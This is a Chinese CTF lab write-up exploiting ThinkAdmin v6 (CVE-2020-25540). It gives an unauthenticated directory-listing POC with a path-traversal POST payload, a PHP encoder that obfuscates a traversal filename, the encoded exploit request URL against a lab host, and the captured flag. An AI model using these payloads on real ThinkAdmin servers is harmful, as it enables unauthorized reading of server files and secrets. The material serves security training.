春秋云镜 CVE-2020-25540

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node

POST:

rules=["/"]

rules=[".../.../.../"] (目录穿越)

2、任意文件读取

使用加密函数对文件名进行加密

php 复制代码
<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v

请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v

base64解密得到文件内容

得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

相关推荐
xiejava10188 分钟前
开源安全管理平台wazuh-暴力破解检测与响应
安全·开源·wuzuh
毕设源码-郭学长7 小时前
【开题答辩全过程】以 安全培训信息管理平台为例,包含答辩的问题和答案
安全
jieyu11199 小时前
网络、主机安全扫描工具
linux·安全·系统安全
FIN666811 小时前
昂瑞微冲刺科创板:创新驱动,引领射频芯片国产化新征程
前端·安全·前端框架·信息与通信·芯片
谈不譚网安13 小时前
Raven2
web安全·网络安全
用户479492835691516 小时前
面试官:讲讲2FA 双因素认证原理
前端·后端·安全
Mintimate17 小时前
Vue项目接口防刷加固:接入腾讯云天御验证码实现人机验证、恶意请求拦截
前端·vue.js·安全
网安INF18 小时前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
深盾安全19 小时前
C++实战:快速提取Android APK数字签名
安全
white-persist19 小时前
SQL 注入详解:从原理到实战
前端·网络·数据库·sql·安全·web安全·原型模式